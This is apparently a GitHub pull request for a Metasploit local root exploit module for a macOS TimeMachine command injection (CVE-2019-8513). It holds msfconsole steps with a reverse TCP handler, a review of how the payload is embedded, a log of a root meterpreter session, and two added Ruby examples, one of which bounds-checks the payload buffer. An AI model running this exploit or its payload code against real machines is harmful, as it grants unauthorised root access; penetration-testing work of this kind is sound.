Add exploit for CVE-2019-8513 (TimeMachine cmd injection) #11726

Merged
merged 12 commits into from Jun 29, 2019

4 participants
@timwr
Contributor

commented Apr 14, 2019

Initial commit of CVE-2019-8513. Ping @ChiChou

Verification

  • Start msfconsole
  • Get a (user) session on OSX < 10.14.4
  • Run the module:
use exploit/osx/local/timemachine_cmd_injection 
set SESSION -1
set LHOST <tab>
set LPORT 4445
exploit 
  • Verify you get a new session as root
  • Document the thing and how it works
@timwr

Contributor Author

commented Apr 14, 2019

  1. Currently there is an issue with cmd_exec when using osx/x64/meterpreter/reverse_tcp, which causes the exploit not to work on that session type. python meterpreter is working however.
  2. The exploit cleanup ejects all drives (so any thumb drives you have attached will be ejected), maybe @ChiChou can help fix this. We know the drive label so it shouldn't be too hard to look that up and eject only that drive.

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from 54bd9f5 to 0472f96 Apr 16, 2019

Review thread on modules/exploits/osx/local/timemachine_cmd_injection.rb (outdated):

def initialize(info = {})
  super(update_info(info,
    'Name' => 'Mac OS X TimeMachine Command Injection Privilege Escalation',

@bcoles
Contributor

commented Apr 17, 2019

I'd like to think this won't be the last command injection LPE in TimeMachine. Perhaps mention tmdiagnose in the title, or something else unique and more applicable.

bcoles and others added some commits Apr 17, 2019

Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from 1895bcd to 1a2a85b Apr 21, 2019

Review threads (outdated):
  • documentation/modules/exploit/osx/local/timemachine_cmd_injection.md
  • modules/exploits/osx/local/timemachine_cmd_injection.rb
  • modules/exploits/osx/local/timemachine_cmd_injection.rb
  • modules/exploits/osx/local/timemachine_cmd_injection.rb

#include <sys/mman.h>

char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";

@bcoles
Contributor

commented Apr 21, 2019

This approach is likely problematic in the unlikely event that the payload is larger than 1024. If it is in fact problematic, then it may be difficult to debug, as the cause won't be immediately obvious, due to clobbering adjacent binary data.

This also results in the payload being written to disk, rather than writing the exploit to disk and executing the payload in memory.

Potential alternatives:

  • adjusting the exploit to accept a command line argument to execute; or
  • adjusting the exploit to spawn a setuid(0,0,0) shell, if feasible, and piping the payload as input through STDIN; or
  • lazy option: adding a warning/error to the exploit method in the event that the generated payload is larger than 1024.

@timwr
Author Contributor

commented Apr 21, 2019

It's actually tmdiagnose that calls back and executes our payload (without any arguments) so there is no way to avoid having some kind of payload on disk. (Unless you can think of a way?).
I'll see if I can pipe the python/command payload through stdin and also add a length check.

@bcoles
Contributor

commented Apr 21, 2019

:shrug: I haven't looked at how the exploit works at all. A closer look reveals the x64 payload obviously can't be piped, unless it's already written to disk, which is less preferable.

Simply adding a length check might be the easiest way.
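The length check bcoles suggests above (and timwr agrees to add) written out as an added example. This is not the module's code: it assumes the compiled binary embeds the placeholder string from the `char root_payload[1024]` declaration quoted in the review thread, and the binary image, the `patch_payload` helper and the payload bytes below are constructed stand-ins, not anything from the PR. The point it demonstrates is the failure mode bcoles describes: writing more than the buffer holds silently clobbers whatever the compiler placed after it, so the size is checked before any byte is written and the image length never changes.

```ruby
# Added example, not the module's code: bounds-checked replacement of the
# fixed-size placeholder buffer inside a binary image. The buffer name and
# size mirror the declaration quoted in the review thread:
#   char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";
PLACEHOLDER = 'ROOT_PAYLOAD_PLACEHOLDER'.b.freeze
BUFFER_SIZE = 1024

# Returns a copy of `binary` with `payload` written over the placeholder
# buffer. The buffer is a C string, so one byte is reserved for the
# terminating NUL; anything longer is rejected up front instead of silently
# overwriting whatever the compiler placed after the buffer.
def patch_payload(binary, payload, buffer_size: BUFFER_SIZE)
  binary  = binary.b
  payload = payload.b
  max_len = buffer_size - 1
  if payload.bytesize > max_len
    raise ArgumentError,
          "payload is #{payload.bytesize} bytes, buffer holds at most #{max_len}"
  end

  offset = binary.index(PLACEHOLDER)
  raise ArgumentError, 'placeholder not found in binary' if offset.nil?
  if binary.bytesize - offset < buffer_size
    raise ArgumentError, 'binary is truncated after the placeholder'
  end

  # Pad with NULs to the full buffer length so the bytes following the
  # buffer are left exactly as they were (the image size never changes).
  patched = binary.dup
  patched[offset, buffer_size] = payload.ljust(buffer_size, "\x00")
  patched
end

# Constructed stand-in for a compiled image: a fake header, the 1024-byte
# buffer as the compiler would lay it out (placeholder then NUL padding),
# and trailing data that a correct patch must leave intact.
SAMPLE_BINARY = ('FAKEHDR'.b + PLACEHOLDER.ljust(BUFFER_SIZE, "\x00") + 'TRAILING_DATA'.b).freeze

# True if the bytes after the buffer survived the patch untouched.
def trailing_intact?(patched)
  patched.b.end_with?('TRAILING_DATA'.b)
end

if __FILE__ == $PROGRAM_NAME
  out = patch_payload(SAMPLE_BINARY, 'sample-payload-bytes')
  puts "patched image size: #{out.bytesize}, trailing intact: #{trailing_intact?(out)}"
  begin
    patch_payload(SAMPLE_BINARY, 'A' * BUFFER_SIZE)
  rescue ArgumentError => e
    puts "rejected oversized payload: #{e.message}"
  end
end
```

Reserving the NUL byte matters because the C side treats the buffer as a string; a 1024-byte payload would compile-time fit the array but leave no terminator, which is the hard-to-diagnose case bcoles warns about.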

bcoles and others added some commits Apr 21, 2019

Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>
Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from 4ca1289 to c12c597 Apr 22, 2019

@timwr timwr force-pushed the timwr:cve_2018_8513 branch from c12c597 to f3f044e Apr 26, 2019

@timwr timwr referenced this pull request May 6, 2019

Merged

Add CVE-2019-8565 OSX Feedback Assistant local root exploit #11818

5 of 5 tasks complete
@busterb

Member

commented Jun 29, 2019

If you can rebase on master, the Travis issues in this PR are resolved upstream.

@busterb

Member

commented Jun 29, 2019

Been testing a few versions. 10.11.6 appeared vulnerable but did not work:

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Uploading file: '/tmp/.auprhsjdiuv'
[*] Executing exploit '/tmp/.auprhsjdiuv'
[*] Exploit result:
2019-06-29 02:19:08.738 .auprhsjdiuv[483:17255] creating dmg image
2019-06-29 02:19:12.838 .auprhsjdiuv[483:17255] mounting malformed disk
2019-06-29 02:19:14.126 .auprhsjdiuv[483:17255] sending XPC msg
2019-06-29 02:19:14.127 .auprhsjdiuv[483:17255] now wait a few minutes for the root command to run
[*] Exploit completed, but no session was created.

10.13.3 worked great:

meterpreter > sysinfo
Computer     : vagrants-MacBook-Pro.local
OS           : macOS High Sierra (macOS 10.13.3)
Architecture : x86
BuildTuple   : 
Meterpreter  : x64/osx
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

Mojave worked fine too.

@busterb busterb changed the title Initial commit of CVE-2019-8513 (TimeMachine cmd injection) Add exploit for CVE-2019-8513 (TimeMachine cmd injection) Jun 29, 2019

@busterb busterb self-assigned this Jun 29, 2019

@busterb busterb merged commit d20801c into rapid7:master Jun 29, 2019

2 of 3 checks passed
  • continuous-integration/travis-ci/pr: The Travis CI build failed
  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.

busterb added a commit that referenced this pull request Jun 29, 2019

@busterb

Member

commented Jun 29, 2019

Release Notes

This adds a module exploiting a command injection in TimeMachine on macOS <= 10.14.3 in order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers from a command injection vulnerability that can be exploited by creating a specially crafted disk label.

msjenkins-r7 added a commit that referenced this pull request Jun 29, 2019

@busterb

Member

commented Jun 29, 2019

Thanks @timwr @bcoles and @ChiChou

@ChiChou


commented Jun 30, 2019

> Been testing a few versions. 10.11.6 appeared vulnerable but did not work:

10.11.6 is not vulnerable. It only works from Sierra (10.12.x) - Mojave (10.14.3)
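The affected range the thread settles on (Sierra 10.12.x through Mojave 10.14.3, with 10.11.6 not affected and the release notes giving macOS <= 10.14.3), turned into a version check as an added example. This is not the module's code; the `affected_macos_version?` and `hosts_needing_update` helpers and the inventory lines are constructed for illustration. It compares versions numerically with `Gem::Version`, because a plain string comparison would order "10.9" after "10.14" and misclassify hosts.

```ruby
# Added example, not the module's code: classify macOS versions against the
# affected range reported in the PR thread. Sierra (10.12.0) is the first
# affected release and 10.14.4 the first patched one; 10.11.6 falls outside.
AFFECTED_FROM = Gem::Version.new('10.12.0')
FIRST_PATCHED = Gem::Version.new('10.14.4')

# Returns true when `version` (e.g. "10.13.3") lies within the affected
# range. Gem::Version compares component-wise, so "10.12" == "10.12.0" and
# "10.9" < "10.14"; malformed input raises ArgumentError.
def affected_macos_version?(version)
  v = Gem::Version.new(version.to_s.strip)
  v >= AFFECTED_FROM && v < FIRST_PATCHED
end

# Constructed sample inventory, one "hostname<TAB>version" line per host,
# of the kind an MDM or asset export might produce. The hostnames are
# invented; the version numbers are the ones discussed in the thread.
SAMPLE_INVENTORY = <<~INV
  build-mac-01\t10.11.6
  vagrants-MacBook-Pro\t10.13.3
  design-mac-07\t10.14.3
  ci-mac-02\t10.14.4
INV

# Returns the hostnames whose reported version is still in the affected
# range, i.e. the machines that should be updated to 10.14.4 or later.
def hosts_needing_update(inventory = SAMPLE_INVENTORY)
  inventory.each_line.map do |line|
    host, ver = line.chomp.split("\t", 2)
    next if host.nil? || ver.nil? || ver.empty?
    host if affected_macos_version?(ver)
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  puts "hosts still affected: #{hosts_needing_update.join(', ')}"
end
```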
